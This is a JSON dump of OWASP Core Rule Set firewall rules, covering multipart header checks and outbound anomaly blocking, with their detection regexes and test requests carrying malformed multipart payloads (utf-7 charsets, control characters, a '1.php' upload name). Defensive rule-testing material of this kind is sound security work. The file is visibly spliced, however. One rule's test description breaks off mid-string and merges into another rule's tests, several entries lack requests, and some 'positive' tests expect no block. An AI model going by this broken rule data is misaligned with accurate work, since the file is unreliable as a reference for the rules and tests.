"act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 46 } }, { "rule_id": "922110", "has_tests": true, "detection": { "variables": [ { "name": "MULTIPART_PART_HEADERS", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^content-type\\s*:\\s*(.*)$", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "2", "message": "Illegal MIME Multipart Header content-type: charset parameter", "logdata": "Matched Data: %{TX.1} found within Content-Type multipart form", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-multipart-header", "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-multipart-header", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/MULTIPART-ATTACK", "capec/272/220" ] }, "test_cases": [ { "description": "Positive test: utf-7 is not in allowed charsets", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=boundary", "Accept": "*/*" }, "data": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-8\n--boundary\nContent-disposition: form-data; name=\"922110\"\nContent-Type: text/plain; charset=utf-7\n\nKnock knock.\n--boundary--\n" }, "expected": { "should_block": true, "rule_ids": [ 922110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-8\n--boundary\nContent-disposition: form-data; name=\"922110\"\nContent-Type: text/plain; charset=utf-7\n\nKnock knock.\n--boundary--\n" } ] }, { "description": "Negative test: utf-8 is allowed", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=boundary", "Accept": "*/*" }, "data": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-8\n--boundary\nContent-disposition: form-data; name=\"negative\"\nContent-Type: text/plain; charset=utf-8\n\nI shold be allowed to get in.\n--boundary--\n" }, "expected": { "should_block": false, "rule_ids": [ 922110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent-disposition: form-data; name=\"_charset_\"\n\nutf-8\n--boundary\nContent-disposition: form-data; name=\"negative\"\nContent-Type: text/plain; charset=utf-8\n\nI shold be allowed to get in.\n--boundary--\n" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 58, "variables": [ { "variable": "MULTIPART_PART_HEADERS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^content-type\\s*:\\s*(.*)$", "actions": [ { "act_name": "id", "lineno": 59, "act_quote": "no_quote", "act_arg": "922110", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 60, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 61, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 62, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 63, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 63, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 64, "act_quote": "quotes", "act_arg": "Illegal MIME Multipart Header content-type: charset parameter", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 65, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.1} found within Content-Type multipart form", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 66, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 67, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 68, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 69, "act_quote": "quotes", "act_arg": "attack-multipart-header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 70, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 71, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 72, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 73, "act_quote": "quotes", "act_arg": "OWASP_CRS/MULTIPART-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 74, "act_quote": "quotes", "act_arg": "capec/272/220", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 75, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 76, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 77, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 58 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "1", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?:(?:\\*|[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]+)/(?:\\*|[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]+)|\\*)(?:[\\s\\x0b]*;[\\s\\x0b]*(?:charset[\\s\\x0b]*=[\\s\\x0b]*\\\"?(?:iso-8859-15?|utf-8|windows-1252)\\b\\\"?|(?:[^\\s\\x0b-\\\"\\(\\),/:-\\?\\[-\\]c\\{\\}]|c(?:[^!\\\"\\(\\),/:-\\?\\[-\\]h\\{\\}]|h(?:[^!\\\"\\(\\),/:-\\?\\[-\\]a\\{\\}]|a(?:[^!\\\"\\(\\),/:-\\?\\[-\\]r\\{\\}]|r(?:[^!\\\"\\(\\),/:-\\?\\[-\\]s\\{\\}]|s(?:[^!\\\"\\(\\),/:-\\?\\[-\\]e\\{\\}]|e[^!\\\"\\(\\),/:-\\?\\[-\\]t\\{\\}]))))))[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]*[\\s\\x0b]*=[\\s\\x0b]*[^!\\(\\),/:-\\?\\[-\\]\\{\\}]+);?)*(?:[\\s\\x0b]*,[\\s\\x0b]*(?:(?:\\*|[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]+)/(?:\\*|[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]+)|\\*)(?:[\\s\\x0b]*;[\\s\\x0b]*(?:charset[\\s\\x0b]*=[\\s\\x0b]*\\\"?(?:iso-8859-15?|utf-8|windows-1252)\\b\\\"?|(?:[^\\s\\x0b-\\\"\\(\\),/:-\\?\\[-\\]c\\{\\}]|c(?:[^!\\\"\\(\\),/:-\\?\\[-\\]h\\{\\}]|h(?:[^!\\\"\\(\\),/:-\\?\\[-\\]a\\{\\}]|a(?:[^!\\\"\\(\\),/:-\\?\\[-\\]r\\{\\}]|r(?:[^!\\\"\\(\\),/:-\\?\\[-\\]s\\{\\}]|s(?:[^!\\\"\\(\\),/:-\\?\\[-\\]e\\{\\}]|e[^!\\\"\\(\\),/:-\\?\\[-\\]t\\{\\}]))))))[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]*[\\s\\x0b]*=[\\s\\x0b]*[^!\\(\\),/:-\\?\\[-\\]\\{\\}]+);?)*)*$", "negated": true } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 78, "variables": [ { "variable": "TX", "variable_part": "1", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?:(?:\\*|[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]+)/(?:\\*|[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]+)|\\*)(?:[\\s\\x0b]*;[\\s\\x0b]*(?:charset[\\s\\x0b]*=[\\s\\x0b]*\\\"?(?:iso-8859-15?|utf-8|windows-1252)\\b\\\"?|(?:[^\\s\\x0b-\\\"\\(\\),/:-\\?\\[-\\]c\\{\\}]|c(?:[^!\\\"\\(\\),/:-\\?\\[-\\]h\\{\\}]|h(?:[^!\\\"\\(\\),/:-\\?\\[-\\]a\\{\\}]|a(?:[^!\\\"\\(\\),/:-\\?\\[-\\]r\\{\\}]|r(?:[^!\\\"\\(\\),/:-\\?\\[-\\]s\\{\\}]|s(?:[^!\\\"\\(\\),/:-\\?\\[-\\]e\\{\\}]|e[^!\\\"\\(\\),/:-\\?\\[-\\]t\\{\\}]))))))[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]*[\\s\\x0b]*=[\\s\\x0b]*[^!\\(\\),/:-\\?\\[-\\]\\{\\}]+);?)*(?:[\\s\\x0b]*,[\\s\\x0b]*(?:(?:\\*|[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]+)/(?:\\*|[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]+)|\\*)(?:[\\s\\x0b]*;[\\s\\x0b]*(?:charset[\\s\\x0b]*=[\\s\\x0b]*\\\"?(?:iso-8859-15?|utf-8|windows-1252)\\b\\\"?|(?:[^\\s\\x0b-\\\"\\(\\),/:-\\?\\[-\\]c\\{\\}]|c(?:[^!\\\"\\(\\),/:-\\?\\[-\\]h\\{\\}]|h(?:[^!\\\"\\(\\),/:-\\?\\[-\\]a\\{\\}]|a(?:[^!\\\"\\(\\),/:-\\?\\[-\\]r\\{\\}]|r(?:[^!\\\"\\(\\),/:-\\?\\[-\\]s\\{\\}]|s(?:[^!\\\"\\(\\),/:-\\?\\[-\\]e\\{\\}]|e[^!\\\"\\(\\),/:-\\?\\[-\\]t\\{\\}]))))))[^!\\\"\\(\\),/:-\\?\\[-\\]\\{\\}]*[\\s\\x0b]*=[\\s\\x0b]*[^!\\(\\),/:-\\?\\[-\\]\\{\\}]+);?)*)*$", "actions": [ { "act_name": "setvar", "lineno": 79, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": true, "oplineno": 78 } }, { "rule_id": "922120", "has_tests": true, "detection": { "variables": [ { "name": "MULTIPART_PART_HEADERS", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "content-transfer-encoding:(.*)", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "2", "message": "Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used", "logdata": "Matched Data: %{TX.0}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-multipart-header", "attack-deprecated-header" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-multipart-header", "attack-deprecated-header", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/MULTIPART-ATTACK", "capec/272/220" ] }, "test_cases": [ { "description": "Positive test: utf-7 is not in allowed charsets", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=boundary", "Accept": "*/*" }, "data": "--boundary\nContent-Disposition: form-data; name=\"flavors\"\nContent-Transfer-Encoding: 8bit\nContent-Type: text/plain; charset=utf-7\n\nPineapple. Pizza.\n--boundary--\n" }, "expected": { "should_block": true, "rule_ids": [ 922120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent-Disposition: form-data; name=\"flavors\"\nContent-Transfer-Encoding: 8bit\nContent-Type: text/plain; charset=utf-7\n\nPineapple. Pizza.\n--boundary--\n" } ] }, { "description": "Negative test: no content-transfer-encoding header should be good", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=boundary", "Accept": "*/*" }, "data": "--boundary\nContent-disposition: form-data; name=\"negative\"\nContent-Type: text/plain\n\nThis should be good as there is no content-transfer-encoding header.\n--boundary--\n" }, "expected": { "should_block": false, "rule_ids": [ 922120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent-disposition: form-data; name=\"negative\"\nContent-Type: text/plain\n\nThis should be good as there is no content-transfer-encoding header.\n--boundary--\n" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 83, "variables": [ { "variable": "MULTIPART_PART_HEADERS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "content-transfer-encoding:(.*)", "actions": [ { "act_name": "id", "lineno": 84, "act_quote": "no_quote", "act_arg": "922120", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 85, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 86, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 87, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 88, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 88, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 89, "act_quote": "quotes", "act_arg": "Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 90, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 91, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 92, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 93, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 94, "act_quote": "quotes", "act_arg": "attack-multipart-header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 95, "act_quote": "quotes", "act_arg": "attack-deprecated-header", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 96, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 97, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 98, "act_quote": "quotes", "act_arg": "OWASP_CRS/MULTIPART-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 99, "act_quote": "quotes", "act_arg": "capec/272/220", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 100, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 101, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 102, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 83 } }, { "rule_id": "922130", "has_tests": true, "detection": { "variables": [ { "name": "MULTIPART_PART_HEADERS", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "[^\\x21-\\x7E][\\x21-\\x39\\x3B-\\x7E]*:", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "2", "message": "Multipart header contains characters outside of valid range", "logdata": "Matched Data: %{TX.0}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-multipart-header" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-multipart-header", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/MULTIPART-ATTACK", "capec/272/220" ] }, "test_cases": [ { "description": "Positive test: special character in multipart header.\nRequest is a multipart request with 2 Content-Disposition headers,\nwhere the first one contains a 0x0E character at the first position.\n--boundary\n\\x0EContent-Disposition: form-data; name=\"file\"; filename=\"1.php\"\nContent-Disposition: form-data; name=\"post\"\n\n\n--boundary--\n" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent-Disposition: form-data; name=\"file\"; filename=\"1.php\"\n\n\n--boundary--\n" } ] }, { "description": "Positive test: special character in multipart header.\nRequest is a multipart request with 2 Content-Disposition headers,\nwhere the first one contains a 0x20 character, the last invalid character before the valid range.\n--boundary\nContent-\\x20Disposition: form-data; name=\"file\"; filename=\"1.php\"\nContent-Disposition: form-data; name=\"post\"\n\n\n--boundary--\n" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent-!Disposition: form-data; name=\"file\"; filename=\"1.php\"\n\n\n--boundary--\n" } ] }, { "description": "Negative test: no character from outside of range in multipart header; '~' is allowed (~, the last valid character in the range of valid characters)", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=boundary", "Accept": "*/*" }, "data": "--boundary\nContent~Disposition: form-data; name=\"file\"; filename=\"1.php\"\nContent-Disposition: form-data; name=\"post\"\n\n\n--boundary--\n" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [ { "location": "post_body", "value": "--boundary\nContent~Disposition: form-data; name=\"file\"; filename=\"1.php\"\nContent-Disposition: form-data; name=\"post\"\n\n\n--boundary--\n" } ] }, { "description": "Positive test: special character in multipart header.\nRequest is a multipart request with 2 Content-Disposition headers,\nwhere the first one contains a 0x7F character, the first invalid character after the valid range.\n--boundary\nContent\\x7F-Disposition: form-data; name=\"file\"; filename=\"1.php\"\nContent-Disposition: form-data; name=\"post\"\n\n\"}" }, "expected": { "should_block": true, "rule_ids": [ 959100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"\"}" } ] }, { "description": "Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered", "test_id": 2, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"\"}" }, "expected": { "should_block": false, "rule_ids": [] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"\"}" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 235, "variables": [ { "variable": "TX", "variable_part": "BLOCKING_OUTBOUND_ANOMALY_SCORE", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@ge", "operator_argument": "%{tx.outbound_anomaly_score_threshold}", "actions": [ { "act_name": "id", "lineno": 236, "act_quote": "no_quote", "act_arg": "959100", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 237, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "deny", "lineno": 238, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 239, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 240, "act_quote": "quotes", "act_arg": "Outbound Anomaly Score Exceeded (Total Score: %{tx.blocking_outbound_anomaly_score})", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 241, "act_quote": "quotes", "act_arg": "anomaly-evaluation", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 242, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 243, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 235 } }, { "rule_id": "959011", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "3", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 245, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 245, "act_quote": "no_quote", "act_arg": "959011", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 245, "act_quote": "no_quote", "act_arg": "3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 245, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 245, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 245, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 245, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 245, "act_quote": "no_quote", "act_arg": "END-RESPONSE-959-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 245 } }, { "rule_id": "959012", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 246, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 246, "act_quote": "no_quote", "act_arg": "959012", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 246, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 246, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 246, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 246, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 246, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 246, "act_quote": "no_quote", "act_arg": "END-RESPONSE-959-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 246 } }, { "rule_id": "959013", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "3", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 253, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 253, "act_quote": "no_quote", "act_arg": "959013", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 253, "act_quote": "no_quote", "act_arg": "3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 253, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 253, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 253, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 253, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 253, "act_quote": "no_quote", "act_arg": "END-RESPONSE-959-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 253 } }, { "rule_id": "959014", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 254, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 254, "act_quote": "no_quote", "act_arg": "959014", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 254, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 254, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 254, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 254, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 254, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 254, "act_quote": "no_quote", "act_arg": "END-RESPONSE-959-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 254 } }, { "rule_id": "959015", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "3", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, 